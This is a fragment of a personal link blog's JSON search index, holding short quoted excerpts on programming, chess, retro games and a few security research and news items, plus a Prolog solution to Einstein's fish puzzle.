matt.sh\n","permalink":"http://karpoke.ignaciocano.com/2016/02/07/how-to-c-in-2016/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe first rule of C is don’t write C if you can avoid it. If you must\nwrite in C, you should follow modern rules. C has been around since\nthe early 1970s. People have ”learned C” at various points during its\nevolution, but knowledge usually get stuck after learning, so\neverybody has a different set of things they believe about C based on\nthe year(s) they first started learning.\u003c/p\u003e","title":"How to C in 2016"},{"content":" Brian Kernighan, autor de uno de los libros de programación más famosos de la historia: C Progamming Language (1978). Previamente, también habría escrito en 1973 un libro llamado A Tutorial Introduction to the Programming Language B, en el cual introdujo por primera vez el ejemplo del famoso “Hello World”\n» Nicolás Rivera | hipertextual.com\n","permalink":"http://karpoke.ignaciocano.com/2016/02/07/cual-es-el-origen-de-hello-world/","summary":"\u003cblockquote\u003e\n\u003cp\u003eBrian Kernighan, autor de uno de los libros de programación más\nfamosos de la historia: C Progamming Language (1978). Previamente,\ntambién habría escrito en 1973 un libro llamado A Tutorial\nIntroduction to the Programming Language B, en el cual introdujo por\nprimera vez el ejemplo del famoso “Hello World”\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Nicolás Rivera | \u003ca href=\"http://hipertextual.com/2016/01/hello-world-origen\"\u003ehipertextual.com\u003c/a\u003e\u003c/p\u003e","title":"¿Cuál es el origen de “Hello world”?"},{"content":" La facilidad de manejo gracias al motor SCUMM y la mezcla única de una buena historia y muchos toques de humor que LucasArts aplicaba en sus aventuras gráficas, se convirtieron a la vez en garantía de calidad y su sello personal. Además del humor que podemos encontrar durante la trama, LucasArts escondió también en sus aventuras gráficas numerosos huevos de pascua y guiños a sus películas o a otros videojuegos.\n» tabernadegrog.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2016/02/07/los-geniales-huevos-de-pascua-de-lucasarts/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa facilidad de manejo gracias al motor SCUMM y la mezcla única de una\nbuena historia y muchos toques de humor que LucasArts aplicaba en sus\naventuras gráficas, se convirtieron a la vez en garantía de calidad y\nsu sello personal. Además del humor que podemos encontrar durante la\ntrama, LucasArts escondió también en sus aventuras gráficas numerosos\nhuevos de pascua y guiños a sus películas o a otros videojuegos.\u003c/p\u003e","title":"Los geniales Huevos de Pascua de LucasArts"},{"content":" But the real key to the print function is somewhat subtle and it all has to do with flexibility, both for the users and the Python development team. For users, making print a function lets you use print as an expression, unlike the print statement which can only be used as a statement.\n» Brett Cannon | snarky.ca\n","permalink":"http://karpoke.ignaciocano.com/2016/01/31/why-print-became-a-function-in-python-3/","summary":"\u003cblockquote\u003e\n\u003cp\u003eBut the real key to the print function is somewhat subtle and it all\nhas to do with flexibility, both for the users and the Python\ndevelopment team. For users, making print a function lets you use\nprint as an expression, unlike the print statement which can only be\nused as a statement.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Brett Cannon | \u003ca href=\"http://www.snarky.ca/why-print-became-a-function-in-python-3\"\u003esnarky.ca\u003c/a\u003e\u003c/p\u003e","title":"Why ‘print’ became a function in Python 3"},{"content":"Éste es un viejo acertijo lógico, atribuido a Einstein:\nEl inglés vive en la casa roja. El sueco tiene perro. El danés toma té. El noruego vive en la primera casa. El Alemán fuma Prince. La casa verde queda inmediatamente a la izquierda de la blanca. El dueño de la casa verde toma café. La persona que fuma Pall Mall cría pájaros. El dueño de la casa amarilla fuma Dunhill. El hombre que vive en la casa del centro toma leche. El hombre que fuma Blends vive al lado del que tiene un gato. El hombre que tiene un caballo vive al lado del que fuma Dunhill. El hombre que fuma Bluemaster toma cerveza. El hombre que fuma Blends es vecino del que toma agua. El noruego vive al lado de la casa azul. Ante estas afirmaciones, la pregunta es: ¿de quién es el pez?\nVeamos una manera de resolverlo utilizando Prolog:\ninsertar(E, L, [E|L]). insertar(E, [X|Y], [X|Z]):-insertar(E, Y, Z). permutacion([], []). permutacion([X|Y], Z):-permutacion(Y, L), insertar(X, L, Z). posicion(X, [X|L], 1). posicion(Y, [X|L], Z):-posicion(Y, L, R), Z is R+1. izquierda(X1, X2, L):-posicion(X1, L, P1), posicion(X2, L, P2), P2 is P1+1. vecinos(P1, P2):-P1 is P2+1;P2 is P1+1. escribir(A, B, C, D, E):-writeln(A), writeln(B), writeln(C), writeln(D), writeln(E). de-quien-es-el-pez(L1, L2, L3, L4, L5):- permutacion([ingles, sueco, danes, noruego, aleman], L1), permutacion([roja, blanca, verde, amarilla, azul], L2), /_ 1. El inglés vive en la casa roja. _/ posicion(ingles, L1, P1), posicion(roja, L2, P1), permutacion([perro, pajaros, gato, caballo, pez], L3), /_ 2. El sueco tiene perro. _/ posicion(sueco, L1, P2), posicion(perro, L3, P2), permutacion([te, cafe, leche, cerveza, agua], L4), /_ 3. El danés toma té. _/ posicion(danes, L1, P3), posicion(te, L4, P3), /_ 4. El noruego vive en la primera casa. _/ posicion(noruego, L1, P4), P4 is 1, permutacion([prince, pallmall, dunhill, blends, bluemaster], L5), /_ 5. El Alemán fuma Prince. _/ posicion(aleman, L1, P5), posicion(prince, L5, P5), /_ 6. La casa verde queda inmediatamente a la izquierda de la blanca. _/ izquierda(verde, blanca, L2), /_ 7. El dueño de la casa verde toma café. _/ posicion(verde, L2, P6), posicion(cafe, L4, P6), /_ 8. La persona que fuma Pall Mall cría pájaros. _/ posicion(pallmall, L5, P7), posicion(pajaros, L3, P7), /_ 9. El dueño de la casa amarilla fuma Dunhill. _/ posicion(amarilla, L2, P8), posicion(dunhill, L5, P8), /_ 10. El hombre que vive en la casa del centro toma leche. _/ posicion(leche, L4, P9), P9 is 3, /_ 11. El hombre que fuma Blends vive al lado del que tiene un gato. _/ posicion(blends, L5, P10), posicion(gato, L3, P11), vecinos(P10, P11), /_ 12. El hombre que tiene un caballo vive al lado del que fuma Dunhill. _/ posicion(caballo, L3, P12), vecinos(P8, P12), /_ 13. El hombre que fuma Bluemaster toma cerveza. _/ posicion(bluemaster, L5, P13), posicion(cerveza, L4, P13), /_ 14. El hombre que fuma Blends es vecino del que toma agua. _/ posicion(agua, L4, P14), vecinos(P10, P14), /_ 15. El noruego vive al lado de la casa azul. _/ posicion(azul, L2, P15), vecinos(P1, P15). main:- de-quien-es-el-pez(L1, L2, L3, L4, L5), escribir(L1, L2, L3, L4, L5). main. Y la solución:\n[noruego,danes,ingles,aleman,sueco] [amarilla,azul,roja,verde,blanca] [gato,caballo,pajaros,pez,perro] [agua,te,leche,cafe,cerveza] [dunhill,blends,pallmall,prince,bluemaster] ","permalink":"http://karpoke.ignaciocano.com/2015/12/26/de-quien-es-el-pez-resuelto-mediante-prolog/","summary":"\u003cp\u003eÉste es un viejo \u003ca href=\"http://hipertextual.com/2015/12/acertijo-de-einstein\"\u003eacertijo lógico\u003c/a\u003e, atribuido a Einstein:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eEl inglés vive en la casa roja.\u003c/li\u003e\n\u003cli\u003eEl sueco tiene perro.\u003c/li\u003e\n\u003cli\u003eEl danés toma té.\u003c/li\u003e\n\u003cli\u003eEl noruego vive en la primera casa.\u003c/li\u003e\n\u003cli\u003eEl Alemán fuma Prince.\u003c/li\u003e\n\u003cli\u003eLa casa verde queda inmediatamente a la izquierda de la blanca.\u003c/li\u003e\n\u003cli\u003eEl dueño de la casa verde toma café.\u003c/li\u003e\n\u003cli\u003eLa persona que fuma Pall Mall cría pájaros.\u003c/li\u003e\n\u003cli\u003eEl dueño de la casa amarilla fuma Dunhill.\u003c/li\u003e\n\u003cli\u003eEl hombre que vive en la casa del centro toma leche.\u003c/li\u003e\n\u003cli\u003eEl hombre que fuma Blends vive al lado del que tiene un gato.\u003c/li\u003e\n\u003cli\u003eEl hombre que tiene un caballo vive al lado del que fuma Dunhill.\u003c/li\u003e\n\u003cli\u003eEl hombre que fuma Bluemaster toma cerveza.\u003c/li\u003e\n\u003cli\u003eEl hombre que fuma Blends es vecino del que toma agua.\u003c/li\u003e\n\u003cli\u003eEl noruego vive al lado de la casa azul.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eAnte estas afirmaciones, la pregunta es: ¿de quién es el pez?\u003c/p\u003e","title":"«¿De quién es el pez?», resuelto mediante Prolog"},{"content":" Ryan Seddon: So how does the browser actually render a website | JSConf EU 2015\n» JSConf | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2015/12/04/ryan-seddon-so-how-does-the-browser-actually-render-a-website-jsconf-eu-2015/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRyan Seddon: So how does the browser actually render a website | JSConf EU 2015\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/SmE4OwHztCc?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» JSConf | \u003ca href=\"https://www.youtube.com/watch?v=SmE4OwHztCc\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Ryan Seddon: So How Does the Browser Actually Render a Website? | JSConf EU 2015"},{"content":" La teoría del electromagnetismo viene codificada en cuatro ecuaciones, solo cuatro, las ecuaciones de Maxwell. Estas ecuaciones controlan todos los procesos electromagnéticos conocidos, todos, al menos a nivel clásico. Eso no está mal del todo porque el electromagnetismo es la piedra angular de nuestra tecnología y, de paso, de nuestra química.\n» cuentos-cuanticos.com\n","permalink":"http://karpoke.ignaciocano.com/2015/11/07/relatividad-general-ondulaciones-en-el-espaciotiempo/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa teoría del electromagnetismo viene codificada en cuatro ecuaciones,\nsolo cuatro, las ecuaciones de Maxwell. Estas ecuaciones controlan\ntodos los procesos electromagnéticos conocidos, todos, al menos a\nnivel clásico. Eso no está mal del todo porque el electromagnetismo es\nla piedra angular de nuestra tecnología y, de paso, de nuestra\nquímica.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://cuentos-cuanticos.com/2015/11/06/relatividad-general-ondulaciones-en-el-espaciotiempo/\"\u003ecuentos-cuanticos.com\u003c/a\u003e\u003c/p\u003e","title":"Relatividad general, ondulaciones en el espaciotiempo"},{"content":" Fue a Bjarne Stroustrup a quién le leí que “un sistema grande y complejo que no ha evolucionado a partir de otro más simple que funcionaba bien, no funciona y, además, es imposible arreglarlo para que funcione” (creo que esto es del libro The Design and Evolution of C++ publicado en 1994). Tal hipótesis se comprobó empíricamente muchas veces en el siglo XX y es por eso que se cambió el foco a proyectos ágiles.\n» Sergio Montoro | lapastillaroja.net\n","permalink":"http://karpoke.ignaciocano.com/2015/11/07/lo-que-sucede-cuando-un-software-se-convierte-en-un-agujero-negro/","summary":"\u003cblockquote\u003e\n\u003cp\u003eFue a Bjarne Stroustrup a quién le leí que “un sistema grande y\ncomplejo que no ha evolucionado a partir de otro más simple que\nfuncionaba bien, no funciona y, además, es imposible arreglarlo para\nque funcione” (creo que esto es del libro The Design and Evolution of\nC++ publicado en 1994). Tal hipótesis se comprobó empíricamente muchas\nveces en el siglo XX y es por eso que se cambió el foco a proyectos\nágiles.\u003c/p\u003e","title":"Lo que sucede cuando un software se convierte en un agujero negro"},{"content":"» Liz Fosslien and Mollie West | qz.com\n","permalink":"http://karpoke.ignaciocano.com/2015/11/07/10-ways-to-ruin-your-start-ups-culture-in-cartoons/","summary":"\u003cp\u003e» Liz Fosslien and Mollie West | \u003ca href=\"http://qz.com/536181/10-ways-to-ruin-your-start-ups-culture-in-cartoons/\"\u003eqz.com\u003c/a\u003e\u003c/p\u003e","title":"10 ways to ruin your start-up’s culture, in cartoons"},{"content":" In this notebook, we cover the basics of probability theory, and show how to implement the theory in Python.\n» Peter Norvig | nbviewer.ipython.org\n","permalink":"http://karpoke.ignaciocano.com/2015/10/17/probability-paradox-and-the-reasonable-person-principle/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn this notebook, we cover the basics of probability theory, and show\nhow to implement the theory in Python.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Peter Norvig | \u003ca href=\"http://nbviewer.ipython.org/url/norvig.com/ipython/Probability.ipynb\"\u003enbviewer.ipython.org\u003c/a\u003e\u003c/p\u003e","title":"Probability, Paradox, and the Reasonable Person Principle"},{"content":" Redis is advanced key-value cache and store, under BSD license. It is very fast, has many data types(String, Hash, List, Set, Sorted Set …), uses RDB or AOF persistence and replication to guarantee data security, and supplies many language client libraries. Most of all, market chooses Redis. There are many companies using Redis and it has proved its worth. Although redis is greate, it still has some disadvantages, and the biggest one is memory limitation. Redis keeps all data in memory, which limits the whole dataset size and lets us save more data impossibly.\n» siddon tang | highscalability.com\n","permalink":"http://karpoke.ignaciocano.com/2015/07/08/reborndb-the-next-generation-distributed-key-value-store/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRedis is advanced key-value cache and store, under BSD license. It is\nvery fast, has many data types(String, Hash, List, Set, Sorted Set …),\nuses RDB or AOF persistence and replication to guarantee data\nsecurity, and supplies many language client libraries. Most of all,\nmarket chooses Redis. There are many companies using Redis and it has\nproved its worth. Although redis is greate, it still has some\ndisadvantages, and the biggest one is memory limitation. Redis keeps\nall data in memory, which limits the whole dataset size and lets us\nsave more data impossibly.\u003c/p\u003e","title":"RebornDB: The next generation distributed key-value store"},{"content":" We demonstrate the extraction of secret decryption keys from laptop computers, by nonintrusively measuring electromagnetic emanations for a few seconds from a distance of 50 cm. The attack can be executed using cheap and readily-available equipment: a consumer-grade radio receiver or a Software Defined Radio USB dongle. The setup is compact and can operate untethered; it can be easily concealed, e.g., inside pita bread. Common laptops, and popular implementations of RSA and ElGamal encryptions, are vulnerable to this attack, including those that implement the decryption using modern exponentiation algorithms such as sliding-window, or even its side-channel resistant variant, fixed-window (m-ary) exponentiation. We successfully extracted keys from laptops of various models running GnuPG (popular open source encryption software, implementing the OpenPGP standard), within a few seconds. The attack sends a few carefully-crafted ciphertexts, and when these are decrypted by the target computer, they trigger the occurrence of specially-structured values inside the decryption software. These special values cause observable fluctuations in the electromagnetic field surrounding the laptop, in a way that depends on the pattern of key bits (specifically, the key-bits window in the exponentiation routine). The secret key can be deduced from these fluctuations, through signal processing and cryptanalysis.\n» tac.ac.il\n","permalink":"http://karpoke.ignaciocano.com/2015/06/25/stealing-keys-from-pcs-using-a-radio-cheap-electromagnetic-attacks-on-windowed-exponentiation/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe demonstrate the extraction of secret decryption keys from laptop\ncomputers, by nonintrusively measuring electromagnetic emanations for\na few seconds from a distance of 50 cm. The attack can be executed\nusing cheap and readily-available equipment: a consumer-grade radio\nreceiver or a Software Defined Radio USB dongle. The setup is compact\nand can operate untethered; it can be easily concealed, e.g., inside\npita bread. Common laptops, and popular implementations of RSA and\nElGamal encryptions, are vulnerable to this attack, including those\nthat implement the decryption using modern exponentiation algorithms\nsuch as sliding-window, or even its side-channel resistant variant,\nfixed-window (m-ary) exponentiation. We successfully extracted keys\nfrom laptops of various models running GnuPG (popular open source\nencryption software, implementing the OpenPGP standard), within a few\nseconds. The attack sends a few carefully-crafted ciphertexts, and\nwhen these are decrypted by the target computer, they trigger the\noccurrence of specially-structured values inside the decryption\nsoftware. These special values cause observable fluctuations in the\nelectromagnetic field surrounding the laptop, in a way that depends on\nthe pattern of key bits (specifically, the key-bits window in the\nexponentiation routine). The secret key can be deduced from these\nfluctuations, through signal processing and cryptanalysis.\u003c/p\u003e","title":"Stealing Keys from PCs using a Radio: Cheap Electromagnetic Attacks on Windowed Exponentiation"},{"content":" David D. Clark, an MIT scientist whose air of genial wisdom earned him the nickname “Albus Dumbledore,” can remember exactly when he grasped the Internet’s dark side. He was presiding over a meeting of network engineers when news broke that a dangerous computer worm — the first to spread widely — was slithering across the wires. One of the engineers, working for a leading computer company, piped up with a claim of responsibility for the security flaw that the worm was exploiting. “Damn,” he said. “I thought I had fixed that bug.” But as the attack raged in November 1988, crashing thousands of machines and causing millions of dollars in damage, it became clear that the failure went beyond a single man. The worm was using the Internet’s essential nature — fast, open and frictionless — to deliver malicious code along computer lines designed to carry harmless files or e-mails.\n» Craig Timberg | washingtonpost.com\n","permalink":"http://karpoke.ignaciocano.com/2015/06/13/a-flaw-in-the-design-part-i/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDavid D. Clark, an MIT scientist whose air of genial wisdom earned him\nthe nickname “Albus Dumbledore,” can remember exactly when he grasped\nthe Internet’s dark side. He was presiding over a meeting of network\nengineers when news broke that a dangerous computer worm — the first\nto spread widely — was slithering across the wires. One of the\nengineers, working for a leading computer company, piped up with a\nclaim of responsibility for the security flaw that the worm was\nexploiting. “Damn,” he said. “I thought I had fixed that bug.” But as\nthe attack raged in November 1988, crashing thousands of machines and\ncausing millions of dollars in damage, it became clear that the\nfailure went beyond a single man. The worm was using the Internet’s\nessential nature — fast, open and frictionless — to deliver malicious\ncode along computer lines designed to carry harmless files or e-mails.\u003c/p\u003e","title":"A flaw in the design (Part I)"},{"content":" The evolution of the Unix operating system is made available as a version-control repository, covering the period from its inception in 1972 as a five thousand line kernel, to 2015 as a widely-used 26 million line system. The repository contains 659 thousand commits and 2306 merges. The repository employs the commonly used Git system for its storage, and is hosted on the popular GitHub archive. It has been created by synthesizing with custom software 24 snapshots of systems developed at Bell Labs, Berkeley University, and the 386BSD team, two legacy repositories, and the modern repository of the open source FreeBSD system. In total, 850 individual contributors are identified, the early ones through primary research. The data set can be used for empirical research in software engineering, information systems, and software archaeology.\n» Diomidis Spinellis | aueb.gr\n","permalink":"http://karpoke.ignaciocano.com/2015/06/06/a-repository-with-44-years-of-unix-evolution/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe evolution of the Unix operating system is made available as a\nversion-control repository, covering the period from its inception in\n1972 as a five thousand line kernel, to 2015 as a widely-used 26\nmillion line system. The repository contains 659 thousand commits and\n2306 merges. The repository employs the commonly used Git system for\nits storage, and is hosted on the popular GitHub archive. It has been\ncreated by synthesizing with custom software 24 snapshots of systems\ndeveloped at Bell Labs, Berkeley University, and the 386BSD team, two\nlegacy repositories, and the modern repository of the open source\nFreeBSD system. In total, 850 individual contributors are identified,\nthe early ones through primary research. The data set can be used for\nempirical research in software engineering, information systems, and\nsoftware archaeology.\u003c/p\u003e","title":"A repository with 44 years of Unix evolution"},{"content":" There are just 32 pieces on a chessboard, but the number of patterns in which those pieces can move in the course of an individual game are astronomical. Still, as these maps show, despite all those different possibilities, each piece has a pretty clear pattern behind it. The maps, which track the most common trajectories of each chess piece, are the works of Steve Tung. Tung explained the process behind the maps to io9, noting that each map represents condensed data from over 2 million individual games of chess.\n» Ria Misra | io9.com\n","permalink":"http://karpoke.ignaciocano.com/2015/06/04/a-map-of-the-most-common-paths-for-all-32-chess-pieces/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThere are just 32 pieces on a chessboard, but the number of patterns\nin which those pieces can move in the course of an individual game are\nastronomical. Still, as these maps show, despite all those different\npossibilities, each piece has a pretty clear pattern behind it. The\nmaps, which track the most common trajectories of each chess piece,\nare the works of Steve Tung. Tung explained the process behind the\nmaps to io9, noting that each map represents condensed data from over\n2 million individual games of chess.\u003c/p\u003e","title":"A Map Of The Most Common Paths For All 32 Chess Pieces"},{"content":" Por aquel entonces, Azpiri se había ganado merecidamente su fama de buen dibujante en periódicos, revistas y álbumes de historietas, por lo que Dinamic contactó con él para realizar su primera portada de un videojuego, el famoso ‘Rocky‘ de 1985. Poco después, en el mismo año, ilustró la aventura ‘Abu Simbel, Profanation‘, para el que escribe uno de los mejores, más adictivos y complicados videojuegos de la historia del entretenimiento digital.\n» Jonathan Préstamo Rodríguez | teknoplof.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/30/alfonso-azpiri-y-la-epoca-dorada-del-software-espanol/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePor aquel entonces, Azpiri se había ganado merecidamente su fama de\nbuen dibujante en periódicos, revistas y álbumes de historietas, por\nlo que Dinamic contactó con él para realizar su primera portada de un\nvideojuego, el famoso ‘Rocky‘ de 1985. Poco después, en el mismo año,\nilustró la aventura ‘Abu Simbel, Profanation‘, para el que escribe uno\nde los mejores, más adictivos y complicados videojuegos de la historia\ndel entretenimiento digital.\u003c/p\u003e","title":"Alfonso Azpiri y la época dorada del software español"},{"content":" La Dama en el Ajedrez no siempre tuvo los movimientos que tiene hoy, de hecho esta figura femenina ni siquiera existía en el tablero. Esta es la historia de como la Dama del Ajedrez se convirtió en la pieza más poderosa.\n» Gabriela González | hipertextual.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/30/como-la-dama-se-convirtio-en-la-pieza-mas-poderosa-del-ajedrez/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa Dama en el Ajedrez no siempre tuvo los movimientos que tiene hoy,\nde hecho esta figura femenina ni siquiera existía en el tablero. Esta\nes la historia de como la Dama del Ajedrez se convirtió en la pieza\nmás poderosa.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Gabriela González | \u003ca href=\"http://hipertextual.com/2015/05/dama-del-ajedrez\"\u003ehipertextual.com\u003c/a\u003e\u003c/p\u003e","title":"Cómo la Dama se convirtió en la pieza más poderosa del Ajedrez"},{"content":" Having a solid foundation in Computer Science is important to become a successful Software Engineer. This guide is a suggested path for university students to develop their technical skills academically and non-academically through self paced hands-on learning. You may use this guide to determine courses to take, but please make sure you are taking courses required for your major in order to graduate. The online resources provided in this guide are not meant to replace courses available at your university. However, they may help supplement your learnings or provide an introduction to a topic.\n» google.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/30/guide-for-technical-development/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHaving a solid foundation in Computer Science is important to become a\nsuccessful Software Engineer. This guide is a suggested path for\nuniversity students to develop their technical skills academically and\nnon-academically through self paced hands-on learning. You may use\nthis guide to determine courses to take, but please make sure you are\ntaking courses required for your major in order to graduate. The\nonline resources provided in this guide are not meant to replace\ncourses available at your university. However, they may help\nsupplement your learnings or provide an introduction to a topic.\u003c/p\u003e","title":"Guide for Technical Development"},{"content":" The rules of chess have remained consistent since the early 19th Century, but that doesn’t mean our approach to the game has stayed the same. Here are some intriguing and surprising ways the Game of Kings has changed its shape over the past 150 years. The history of chess dates back 1,500 years, but it wasn’t until the introduction of competitive chess in 1834 that the rules were solidified. Since that time, players of all calibers have diligently worked to find new and better ways of winning.\n» George Dvorsky | io9.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/29/how-chess-has-changed-over-the-last-150-years/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe rules of chess have remained consistent since the early 19th\nCentury, but that doesn’t mean our approach to the game has stayed the\nsame. Here are some intriguing and surprising ways the Game of Kings\nhas changed its shape over the past 150 years. The history of chess\ndates back 1,500 years, but it wasn’t until the introduction of\ncompetitive chess in 1834 that the rules were solidified. Since that\ntime, players of all calibers have diligently worked to find new and\nbetter ways of winning.\u003c/p\u003e","title":"How Chess Has Changed Over The Last 150 Years"},{"content":" After HeartBleed, POODLE and FREAK encryption flaws, a new encryption attack has been emerged over the Internet that allows attackers to read and modify the sensitive data passing through encrypted connections, potentially affecting hundreds of thousands of HTTPS-protected sites, mail servers, and other widely used Internet services. A team of security researchers has discovered a new attack, dubbed Logjam, that allows a man-in-the-middle (MitM) to downgrade encrypted connections between a user and a Web or email server to use extremely weaker 512-bit keys which can be easily decrypted.\n» Mohit Kumar | thehackernews.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/20/logjam-this-new-encryption-glitch-puts-internet-users-at-risk/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAfter HeartBleed, POODLE and FREAK encryption flaws, a new encryption\nattack has been emerged over the Internet that allows attackers to\nread and modify the sensitive data passing through encrypted\nconnections, potentially affecting hundreds of thousands of\nHTTPS-protected sites, mail servers, and other widely used Internet\nservices. A team of security researchers has discovered a new attack,\ndubbed Logjam, that allows a man-in-the-middle (MitM) to downgrade\nencrypted connections between a user and a Web or email server to use\nextremely weaker 512-bit keys which can be easily decrypted.\u003c/p\u003e","title":"LogJam — This new encryption glitch puts Internet users at risk"},{"content":" One of the most crucial pieces of any UNIX-like operating system is the init dæmon process. In Linux, this process is started by the kernel, and it’s the first userspace process to spawn and the last one to die during shutdown. During the history of UNIX and Linux, many init systems have gained popularity and then faded away. In this article, I focus on the history of the init system as it relates to Linux, and I talk about the role of init in a modern Linux system. I also relate some of the history of the System V Init (SysV) scheme, which was the de facto standard for many Linux distributions for a long time. Then I cover a couple more modern approaches to system initialization, such as Upstart and systemd. Finally, I pay some attention to how things work in systemd, as this seems to be the popular choice at the moment for several of the largest distributions.\n» Jonas Gorauskas | linuxjournal.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/20/initializing-and-managing-services-in-linux-past-present-and-future/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOne of the most crucial pieces of any UNIX-like operating system is\nthe init dæmon process. In Linux, this process is started by the\nkernel, and it’s the first userspace process to spawn and the last one\nto die during shutdown. During the history of UNIX and Linux, many\ninit systems have gained popularity and then faded away. In this\narticle, I focus on the history of the init system as it relates to\nLinux, and I talk about the role of init in a modern Linux system. I\nalso relate some of the history of the System V Init (SysV) scheme,\nwhich was the de facto standard for many Linux distributions for a\nlong time. Then I cover a couple more modern approaches to system\ninitialization, such as Upstart and systemd. Finally, I pay some\nattention to how things work in systemd, as this seems to be the\npopular choice at the moment for several of the largest distributions.\u003c/p\u003e","title":"Initializing and Managing Services in Linux: Past, Present and Future"},{"content":" In the modern era, software is commonly delivered as a service: called web apps, or software-as-a-service. The twelve-factor app is a methodology for building software-as-a-service apps that: Use declarative formats for setup automation, to minimize time and cost for new developers joining the project; Have a clean contract with the underlying operating system, offering maximum portability between execution environments; Are suitable for deployment on modern cloud platforms, obviating the need for servers and systems administration; Minimize divergence between development and production, enabling continuous deployment for maximum agility; And can scale up without significant changes to tooling, architecture, or development practices. The twelve-factor methodology can be applied to apps written in any programming language, and which use any combination of backing services (database, queue, memory cache, etc).\n» 12factor.net\n","permalink":"http://karpoke.ignaciocano.com/2015/05/18/the-twelve-factor-app/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the modern era, software is commonly delivered as a service: called\nweb apps, or software-as-a-service. The twelve-factor app is a\nmethodology for building software-as-a-service apps that: Use\ndeclarative formats for setup automation, to minimize time and cost\nfor new developers joining the project; Have a clean contract with the\nunderlying operating system, offering maximum portability between\nexecution environments; Are suitable for deployment on modern cloud\nplatforms, obviating the need for servers and systems administration;\nMinimize divergence between development and production, enabling\ncontinuous deployment for maximum agility; And can scale up without\nsignificant changes to tooling, architecture, or development\npractices. The twelve-factor methodology can be applied to apps\nwritten in any programming language, and which use any combination of\nbacking services (database, queue, memory cache, etc).\u003c/p\u003e","title":"The Twelve-Factor App"},{"content":" “La única forma de ganar es no jugar”. Tom Murphy, programador, creó en 2013 un programa que era capaz de aprender a jugar a Super Mario Bros de forma que en sucesivas partidas conseguía salvar los distintos obstáculos que se encontraba el personaje hasta ganar el juego. Cuando enfrentó su software al Tetris, sin embargo, Murphy se encontró con que no había victoria posible.\n» R. Pérez | elconfidencial.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/05/las-matematicas-explican-por-que-no-puedes-ganar-al-tetris-hagas-lo-que-hagas/","summary":"\u003cblockquote\u003e\n\u003cp\u003e“La única forma de ganar es no jugar”. Tom Murphy, programador, creó\nen 2013 un programa que era capaz de aprender a jugar a Super Mario\nBros de forma que en sucesivas partidas conseguía salvar los distintos\nobstáculos que se encontraba el personaje hasta ganar el juego. Cuando\nenfrentó su software al Tetris, sin embargo, Murphy se encontró con\nque no había victoria posible.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» R. Pérez | \u003ca href=\"http://www.elconfidencial.com/tecnologia/2015-05-02/las-matematicas-explican-por-que-no-puedes-ganar-al-tetris-hagas-lo-que-hagas_786085/\"\u003eelconfidencial.com\u003c/a\u003e\u003c/p\u003e","title":"Las matemáticas explican por qué no puedes ganar al Tetris hagas lo que hagas"},{"content":" El cerebro es un órgano fascinante y relativamente desconocido para la ciencia (y para muchos que tienen uno y lo usan poco, pero eso es otra historia) y es capaz de cosas realmente increíbles, como por ejemplo ser consciente de si mismo, pero sin embargo también tiene un buen número de defectos que permite engañarlo de una manera relativamente fácil. Las desarrolladoras lo saben y muchas de ellas se aprovechan de ellas, pervirtiendo un modelo como el free-to-play que podría tener enormes virtudes y convirtiéndolo en una máquina sacacuartos del Lado Oscuro.\n» Javier Elío | elandroidelibre.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/03/como-tu-traidor-cerebro-te-hace-gastar-dinero-en-los-juegos-freeplay/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl cerebro es un órgano fascinante y relativamente desconocido para la\nciencia (y para muchos que tienen uno y lo usan poco, pero eso es otra\nhistoria) y es capaz de cosas realmente increíbles, como por ejemplo\nser consciente de si mismo, pero sin embargo también tiene un buen\nnúmero de defectos que permite engañarlo de una manera relativamente\nfácil. Las desarrolladoras lo saben y muchas de ellas se aprovechan de\nellas, pervirtiendo un modelo como el free-to-play que podría tener\nenormes virtudes y convirtiéndolo en una máquina sacacuartos del Lado\nOscuro.\u003c/p\u003e","title":"Cómo tu traidor cerebro te hace gastar dinero en los juegos freeplay"},{"content":" You don’t often see clever 